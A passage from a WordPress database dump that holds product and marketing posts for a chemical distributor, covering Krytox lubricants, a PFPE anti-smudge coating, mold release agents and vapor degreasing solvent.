Systems</strong>\r\n\r\nThere are several manufacturers of equipment that can be used for these applications. The systems can be purchased from one source or fabricated locally from many sources. Automatic dispensing systems for adhesives, sealants, or lubricants can be used as the supply system. Manufacturers such as GRACO, Hydrotech, LCC-Dispensit, or a local distributor can provide controlled application systems for precise dispensing.\r\n\r\nUse of disposable foam tips or brushes can allow accurate coverage of most shapes. Companies such as Designetics or others can provide help in this area.\r\n\r\nChoose Krytox™ for long-lasting lubrication that helps improve vehicle performance and customer satisfaction.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—performance lubricants from Chemours can help. At Chemours, we put our science to work to produce lubricants that can stand up to today’s engineering design demands—no matter how tough the conditions. It’s reliability you can count on, from a name you trust.\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Noise, Vibration, Harshness" ]', 'Krytox For Automotive Noise, Vibration, and Harshness', '', 'inherit', 'closed', 'closed', '', '2450-revision-v1', '', '', '2016-10-10 15:36:06', '2016-10-10 15:36:06', '', 2450, 'https://www.miller-stephenson.com/2450-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2455, 2, '2016-10-10 15:37:21', '2016-10-10 15:37:21', '<p><strong>Krytox™ Lubricants Can Help Solve Your Automotive Noise, Vibration, and Harshness issues.</strong></p>\n<p>Inside an automobile’s interior, there are a variety of places where different materials come into contact with one another. Examples include metal on plastic, leather on leather, weather stripping, and many others. Movement between these surfaces often results in a series of noises typically described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises with just a small amount of lubricant at the interface.</p>\n<p>Because these applications are intended to be a one-time application, it is important to choose a lubricant that is easy to apply, has low volatility, and will remain in place over the normal useful life of the vehicle. Krytox™ oils and greases are the answer.</p>\n<p>Krytox™ oils and greases stand up to harsh environments and high temperatures to lubricate weather stripping and parts prone to noise and wear. Krytox™ prevents weather stripping from cracking, shrinking, and swelling to help reduce wind noise, drafts, and water leakage. And, when used on moving parts, Krytox™ lubricants can minimize the shock and stress that cause squeaks, rattles, and damage.</p>\n<p>Krytox™ oils and greases are compatible with a wide variety of materials, and they have the frictional and long life characteristics that make them ideal lubricants in noise, vibration, and harshness applications.</p>\n<p><strong>Oils and Greases That Really Work in Demanding Real-Life Applications</strong></p>\n<p>Reliable high-performance fluoropolymer lubricants from Chemours can prevent unwanted noises without relubrication. Krytox™ oils and greases are easy to apply, have low volatility, and are long-lasting in aggressive environments.</p>\n<p>Krytox™ Value</p>\n<ul>\n<li>Long-lasting, cost effective lubrication— Krytox™ prevents unwanted noises without re-lubrication. And, Krytox™ stays put, so you can apply a small amount without fear of migration.</li>\n<li>Material compatibility—Because Krytox™ is compatible with metals, elastomers, and engineering plastics, it won’t damage the components, allowing them to last as designed. • Chemical compatibility and environmental safety—Krytox™ lubricants are chemically, biologically, and environmentally inert, as well as silicone-free. And, they contain no hazardous volatile organic compound materials or chlorine.</li>\n<li>Lubricity—Krytox™ provides excellent lubricity because of its low coefficient of friction and low surface energy; and because it doesn’t oxidize, it won’t turn sticky or change color.</li>\n</ul>\n<p><strong>Application Guidance</strong></p>\n<p>The typical coverage for Krytox™ when properly applied is approximately 4 g/m2. Most applications are less than 0.2 g. Each application must be considered separately in order to ensure the best solution is found. There are two main components of any application method:</p>\n<ol>\n<li>Controlled metering of the material from the container to the applicator. This is best done automatically to ensure accuracy and repeatability.</li>\n<li>Transfer of the material from the applicator to the component. This can be either a manual application, using a brush or foam applicator, or automatically—either by spraying or wiping by robot or specially designed jig.</li>\n</ol>\n<p><strong>Application Examples</strong></p>\n<p>Automakers from around the world have a long history of using Krytox™ oils and greases to help eliminate automotive squeaks and rattles.</p>\n<p>Here are just a few of the many pain points Krytox™ has been proven to help silence:</p>\n<ul>\n<li>Leather trim, seats, and console parts—Leather-onleather friction can create an irritating noise. Krytox™ gets rid of the itch without staining the leather or becoming sticky over time.</li>\n<li>Plastic door panel and metal frame—Because Krytox™ is compatible with metals, elastomers, and plastics, it effectively silences noise caused by the interaction of various materials. And, Krytox™ won’t oxidize or discolor plastic. Apply by spraying by hand or using a robot.</li>\n<li>Rubber gaskets and seals—A thin film of Krytox™ can lubricate sliding contact in convertible tops, sunroofs, trunk lids, and doors to keep the rubber compound in good condition, and protected from oxidation. Grease or oil can be applied by hand, or a jig can be used to guide the application.</li>\n<li>Window lift systems and weather stripping—Krytox™ can stop weather strip “bunching” and “gathering,” and help eliminate the wind noise produced as window glass is raised. Awkward configuration<br />\nof these seals usually means that automatic application is difficult. An automatic dispenser in conjunction with disposable foam applicators is often used. The amount can be controlled by ensuring a preset quantity is dispensed directly from the supply onto the applicator.</li>\n</ul>\n<p><img class="alignnone size-medium wp-image-2452" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/noise-vibration-harshness-800x455.jpg" alt="noise-vibration-harshness" width="800" height="455" /></p>\n<p><strong>Application Systems</strong></p>\n<p>There are several manufacturers of equipment that can be used for these applications. The systems can be purchased from one source or fabricated locally from many sources. Automatic dispensing systems for adhesives, sealants, or lubricants can be used as the supply system. Manufacturers such as GRACO, Hydrotech, LCC-Dispensit, or a local distributor can provide controlled application systems for precise dispensing.</p>\n<p>Use of disposable foam tips or brushes can allow accurate coverage of most shapes. Companies such as Designetics or others can provide help in this area.</p>\n<p>Choose Krytox™ for long-lasting lubrication that helps improve vehicle performance and customer satisfaction.</p>\n<p>Whatever your engineering challenge—longer part life, extreme temperatures, reduced failures—performance lubricants from Chemours can help. At Chemours, we put our science to work to produce lubricants that can stand up to today’s engineering design demands—no matter how tough the conditions. It’s reliability you can count on, from a name you trust.</p>\n[ux_product_categories ids="46,37,45" number="10"]', 'Krytox For Automotive Noise, Vibration, and Harshness', '', 'inherit', 'closed', 'closed', '', '2450-revision-v1', '', '', '2016-10-10 15:37:21', '2016-10-10 15:37:21', '', 2450, 'https://www.miller-stephenson.com/2450-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2456, 2, '2016-10-10 15:38:39', '2016-10-10 15:38:39', '<strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> Lubricants Can Help Solve Your Automotive Noise, Vibration, and Harshness issues.</strong>\r\n\r\nInside an automobile’s interior, there are a variety of places where different materials come into contact with one another. Examples include metal on plastic, leather on leather, weather stripping, and many others. Movement between these surfaces often results in a series of noises typically described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises with just a small amount of lubricant at the interface.\r\n\r\nBecause these applications are intended to be a one-time application, it is important to choose a lubricant that is easy to apply, has low volatility, and will remain in place over the normal useful life of the vehicle. Krytox™ oils and greases are the answer.\r\n\r\nKrytox™ oils and greases stand up to harsh environments and high temperatures to lubricate weather stripping and parts prone to noise and wear. Krytox™ prevents weather stripping from cracking, shrinking, and swelling to help reduce wind noise, drafts, and water leakage. And, when used on moving parts, Krytox™ lubricants can minimize the shock and stress that cause squeaks, rattles, and damage.\r\n\r\nKrytox™ oils and greases are compatible with a wide variety of materials, and they have the frictional and long life characteristics that make them ideal lubricants in noise, vibration, and harshness applications.\r\n\r\n<strong>Oils and Greases That Really Work in Demanding Real-Life Applications</strong>\r\n\r\nReliable high-performance fluoropolymer lubricants from Chemours can prevent unwanted noises without relubrication. Krytox™ oils and greases are easy to apply, have low volatility, and are long-lasting in aggressive environments.\r\n\r\nKrytox™ Value\r\n<ul>\r\n 	<li>Long-lasting, cost effective lubrication— Krytox™ prevents unwanted noises without re-lubrication. And, Krytox™ stays put, so you can apply a small amount without fear of migration.</li>\r\n 	<li>Material compatibility—Because Krytox™ is compatible with metals, elastomers, and engineering plastics, it won’t damage the components, allowing them to last as designed. • Chemical compatibility and environmental safety—Krytox™ lubricants are chemically, biologically, and environmentally inert, as well as silicone-free. And, they contain no hazardous volatile organic compound materials or chlorine.</li>\r\n 	<li>Lubricity—Krytox™ provides excellent lubricity because of its low coefficient of friction and low surface energy; and because it doesn’t oxidize, it won’t turn sticky or change color.</li>\r\n</ul>\r\n<strong>Application Guidance</strong>\r\n\r\nThe typical coverage for Krytox™ when properly applied is approximately 4 g/m2. Most applications are less than 0.2 g. Each application must be considered separately in order to ensure the best solution is found. There are two main components of any application method:\r\n<ol>\r\n 	<li>Controlled metering of the material from the container to the applicator. This is best done automatically to ensure accuracy and repeatability.</li>\r\n 	<li>Transfer of the material from the applicator to the component. This can be either a manual application, using a brush or foam applicator, or automatically—either by spraying or wiping by robot or specially designed jig.</li>\r\n</ol>\r\n<strong>Application Examples</strong>\r\n\r\nAutomakers from around the world have a long history of using Krytox™ oils and greases to help eliminate automotive squeaks and rattles.\r\n\r\nHere are just a few of the many pain points Krytox™ has been proven to help silence:\r\n<ul>\r\n 	<li>Leather trim, seats, and console parts—Leather-onleather friction can create an irritating noise. Krytox™ gets rid of the itch without staining the leather or becoming sticky over time.</li>\r\n 	<li>Plastic door panel and metal frame—Because Krytox™ is compatible with metals, elastomers, and plastics, it effectively silences noise caused by the interaction of various materials. And, Krytox™ won’t oxidize or discolor plastic. Apply by spraying by hand or using a robot.</li>\r\n 	<li>Rubber gaskets and seals—A thin film of Krytox™ can lubricate sliding contact in convertible tops, sunroofs, trunk lids, and doors to keep the rubber compound in good condition, and protected from oxidation. Grease or oil can be applied by hand, or a jig can be used to guide the application.</li>\r\n 	<li>Window lift systems and weather stripping—Krytox™ can stop weather strip “bunching” and “gathering,” and help eliminate the wind noise produced as window glass is raised. Awkward configuration\r\nof these seals usually means that automatic application is difficult. An automatic dispenser in conjunction with disposable foam applicators is often used. The amount can be controlled by ensuring a preset quantity is dispensed directly from the supply onto the applicator.</li>\r\n</ul>\r\n<img class="alignnone size-medium wp-image-2452" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/noise-vibration-harshness-800x455.jpg" alt="noise-vibration-harshness" width="800" height="455" />\r\n\r\n<strong>Application Systems</strong>\r\n\r\nThere are several manufacturers of equipment that can be used for these applications. The systems can be purchased from one source or fabricated locally from many sources. Automatic dispensing systems for adhesives, sealants, or lubricants can be used as the supply system. Manufacturers such as GRACO, Hydrotech, LCC-Dispensit, or a local distributor can provide controlled application systems for precise dispensing.\r\n\r\nUse of disposable foam tips or brushes can allow accurate coverage of most shapes. Companies such as Designetics or others can provide help in this area.\r\n\r\nChoose Krytox™ for long-lasting lubrication that helps improve vehicle performance and customer satisfaction.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—performance lubricants from Chemours can help. At Chemours, we put our science to work to produce lubricants that can stand up to today’s engineering design demands—no matter how tough the conditions. It’s reliability you can count on, from a name you trust.\r\n\r\n[ux_product_categories ids="46,37,45" number="10"]', 'Krytox For Automotive Noise, Vibration, and Harshness', '', 'inherit', 'closed', 'closed', '', '2450-revision-v1', '', '', '2016-10-10 15:38:39', '2016-10-10 15:38:39', '', 2450, 'https://www.miller-stephenson.com/2450-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2457, 2, '2016-10-10 15:44:49', '2016-10-10 15:44:49', 'Krytox GPL 203 grease is polytetrafluoroethylene (PTFE)-thickened, contains no additives, and can be used on components that come in contact with chemicals. Typical applications include valves, instruments, or bearings that come into contact with chemicals, such as alcohols, ammonia, solvents, steam, acids and bases, and oxygen systems, e.g., LOX1 and GOX2. Krytox GPL 203 grease is commonly used as a lubricant for seals and O-rings, and is compatible with most types of seals.\n\nKrytox oils and greases are silicone-free. They do not contain any VOC3 materials or chlorine and are not hazardous to the atmosphere or ozone layer. They are biologically and environmentally inert.\n\nKrytox GPL 203 grease is the product of choice in extreme temperature conditions. Most petroleum products begin to degrade above 99 °C (210 °F) and are too viscous at temperatures just below –18 °C (0 °F). Under the D-3336 test conditions of 177 °C (350 °F) and 10,000 rpm, the majority of competing hydrocarbon lubricants fail in less than 1,000 hr. But, the general purpose line of Krytox lubricants has been shown to last over 5,000 hr without failure, even at an increased temperature of 200 °C (392 °F). This extreme condition performance is what distinguishes Krytox performance lubricants from other competing products.\n\nKrytox GPL 203 grease is cost-effective across a wide range of applications. Due to their inert nature, Krytox lubricants provide a much longer usable life as compared to typical hydrocarbon oils and greases; and the longer usable life allows them to remain for considerable periods of time before needing to be replaced, if they are replaced at all. That translates to savings over time, both by lowering the amount of lubricant purchased and any downtime incurred during re-lubrication.\n\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\n\nKrytox performance lubricants are not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\n\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\n\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\n\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox/">For a general Krytox application overview, click here.</a>\n\nWith help\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;', 'GPL 203', 'Krytox GPL 203 has a Oil Viscosity of 30 cSt at 40°C.\n<br /><br />\nEstimated useful temperature range is -60°C to 154°C.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '784-autosave-v1', '', '', '2016-10-10 15:44:49', '2016-10-10 15:44:49', '', 784, 'https://www.miller-stephenson.com/784-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2458, 0, '2016-10-10 15:53:34', '2016-10-10 15:53:34', '', '', '', 'publish', 'closed', 'closed', '', '2458', '', '', '2016-10-10 15:53:34', '2016-10-10 15:53:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/2458/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2459, 3, '2016-10-10 15:56:26', '2016-10-10 15:56:26', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-10 15:56:26', '2016-10-10 15:56:26', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2460, 2, '2016-10-10 17:30:47', '2016-10-10 17:30:47', '<h2><strong>Krytox KS 1220 | Functional Polymer | Anti-Smudge | Anti-Fouling | Coating</strong></h2>\r\nKrytox KS 1220 functional polymer is an innovative perfluoropolyether (PFPE) alkoxysilane developed by Chemours. It takes advantage of the technology behind Krytox performance lubricants to impart anti-smudge, antifouling, and easy-clean properties to a variety of surfaces. The unique chemical structure of Krytox KS 1220 provides treated substrates with excellent oil and water repellency, as well as low coefficient of friction. As a result, surfaces treated with Krytox KS 1220 exhibit a smooth feel and are scratch-resistant. Krytox KS 1220 is an ideal easy-clean coating solution for maintaining the appearance and integrity of highly manipulated surfaces, such as touch panel displays, cover glass, optical lenses, and metal casings.\r\n<h3><span style="font-size: 80%;"><strong>Properties</strong></span></h3>\r\n<ul>\r\n 	<li><span style="font-size: 100%;">Hydrophobic and oleophobic</span></li>\r\n 	<li><span style="font-size: 100%;">Abrasion resistance</span></li>\r\n 	<li><span style="font-size: 100%;">Low coefficient of friction</span></li>\r\n 	<li><span style="font-size: 100%;">Chemically stable in non-alkali cleaners</span></li>\r\n 	<li><span style="font-size: 100%;">Durable and transparent</span></li>\r\n 	<li><span style="font-size: 100%;">Thermal and UV resistance</span></li>\r\n</ul>\r\n<h3><span style="font-size: 80%;"><strong>Application Methods</strong></span></h3>\r\nKrytox KS 1220 functional polymer can be applied by dip coating, spray, or physical vapor deposition (PVD) methods. In general, spray coating is recommended, because it allows the coating procedure to be amenable for a continuous process. The thermal stability of Krytox KS 1220, and its ability to moisture cure, permits a wide range of curing conditions.\r\n<h3><span style="font-size: 80%;"><strong>Preparing a Surface</strong></span></h3>\r\nAn activated surface with reactive, ideally hydroxyl, functionality is necessary for Krytox KS 1220 to chemically bind to the substrate. Therefore, thorough cleaning and activation of the surface to be coated is critical for the proper performance of Krytox KS 1220. Without proper cleaning, surface contamination may impede chemical binding and negatively impact the product’s performance. When necessary, plasma or ion-discharge treatment may be used to activate the surface and enhance the bonding between Krytox KS 1220 and the substrate. Alternatively, chemical and/or physical methods may be necessary, depending on\r\nthe application.\r\n<h3><img class="size-full wp-image-2461 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/KS-1220-Treatment.jpg" alt="ks-1220-treatment" width="269" height="452" /><span style="font-size: 80%;"><strong>Coating a Surface</strong></span></h3>\r\nKrytox KS 1220 functional polymer is typically prepared by diluting the product to 0.1–0.5% by weight with solvents having a boiling range of 50–110 °C (122–230 °F). Solvents suitable for use with KS 1220 include fluorinated fluids, such as Vertrel XF and Vertrel Suprion from Miller-Stephenson. This coating can be applied by dip coating, spraying, or vapor deposition methods.\r\n<h3><span style="font-size: 80%;"><strong>Curing</strong></span></h3>\r\nFor optimum surface treatment, KS 1220 functional polymer must chemically bind to the substrate surface through a proper curing process. Thermal curing at 100–150 °C (212–302 °F) for 30–60 min is recommended for most applications. However, temperature and cure times may be varied to achieve optimal performance. Using a lower temperature and longer cure time can be helpful to achieve optimal performance for materials with lower thermal tolerance. Water is required to cure Krytox KS 1220. If surface moisture is not present, a humidity-controlled environment around 50–90% RH should be utilized.\r\n<h3><span style="font-size: 80%;"><strong>Post-Cure Process</strong></span></h3>\r\nDepending on the coating method, residual material may be visible on the coated surface. Simply wipe the surface with a lint-free, microfiber cloth until visually clear. Covering the surface with a protective film is recommended for proper storage.\r\n<h3><span style="font-size: 80%;"><strong>Characteristics of KS 1220</strong></span></h3>\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250"></td>\r\n<td style="text-align: center;" width="206"><strong>Unit</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Krytox KS 1220</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td></td>\r\n<td style="text-align: center;">Clear Liquid</td>\r\n</tr>\r\n<tr>\r\n<td>Contentration1</td>\r\n<td style="text-align: center;">%</td>\r\n<td style="text-align: center;">20</td>\r\n</tr>\r\n<tr>\r\n<td>Solvent Boiling Point</td>\r\n<td style="text-align: center;">°C</td>\r\n<td style="text-align: center;">55</td>\r\n</tr>\r\n<tr>\r\n<td>pH</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Neutral</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity2</td>\r\n<td style="text-align: center;">g/cm^-3</td>\r\n<td style="text-align: center;">1.6</td>\r\n</tr>\r\n<tr>\r\n<td>Solvent Vapor Pressure</td>\r\n<td style="text-align: center;">hPa</td>\r\n<td style="text-align: center;" width="206">248 at 20 °C (68 °F)\r\n313 at 25 °C (77 °F)\r\n854 at 50 °C (122 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3><span style="font-size: 80%;"><strong>Handling Instructions</strong></span></h3>\r\nPlease refer to the Safety Data Sheet (SDS) prior to using and handling Krytox KS 1220 functional polymer. When handling Krytox KS 1220, work in a well-ventilated area to avoid inhalation hazards. Wear safety glasses and nitrile gloves to avoid unintended exposure. Krytox KS 1220 is moisture-sensitive; therefore, appropriate methods should be used to ensure the sustained reactivity of the material. If an open bottle is to be reused, re-introducing a nitrogen blanket and refrigeration will prolong the shelf life.\r\n<h3><span style="font-size: 80%;"><strong>Packaging</strong></span></h3>\r\nKytox KS 1220 functional polymer is offered as a 20% solution in Vertrel XF fluorosolvent and available in either 100- or 500-g (0.22- or 1.1-lb) amber glass bottles. The product is packaged under nitrogen, and refrigerated storage is recommended.\r\n\r\n<img class="alignnone wp-image-2462" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/ks-1220-beads-800x309.jpg" alt="ks-1220-beads" width="652" height="252" />\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">To learn more about which Krytox product is right for you, please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-faq/">Krytox Frequently Asked Questions (FAQ)</a>', 'KS 1220', 'Krytox KS 1220 functional polymer is an innovative perfluoropolyether (PFPE) alkoxysilane developed by Chemours.\r\n\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'krytox-ks-1220', '', '', '2017-04-19 15:49:12', '2017-04-19 15:49:12', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2460', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2461, 2, '2016-10-10 17:20:06', '2016-10-10 17:20:06', '', 'ks-1220-treatment', '', 'inherit', 'closed', 'closed', '', 'ks-1220-treatment', '', '', '2016-10-10 17:20:06', '2016-10-10 17:20:06', '', 2460, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/KS-1220-Treatment.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2462, 2, '2016-10-10 17:22:45', '2016-10-10 17:22:45', '', 'ks-1220-beads', '', 'inherit', 'closed', 'closed', '', 'ks-1220-beads', '', '', '2016-10-10 17:22:45', '2016-10-10 17:22:45', '', 2460, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/ks-1220-beads.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2463, 2, '2016-10-10 17:25:32', '2016-10-10 17:25:32', '', 'Krytox KS 1220', '', 'inherit', 'closed', 'closed', '', 'shutterstock_84131626', '', '', '2016-10-10 17:28:25', '2016-10-10 17:28:25', '', 2460, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_84131626.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2464, 2, '2016-10-10 17:49:19', '2016-10-10 17:49:19', '<strong>What is Vapor Degreasing?</strong>\r\n\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n\r\n<strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low 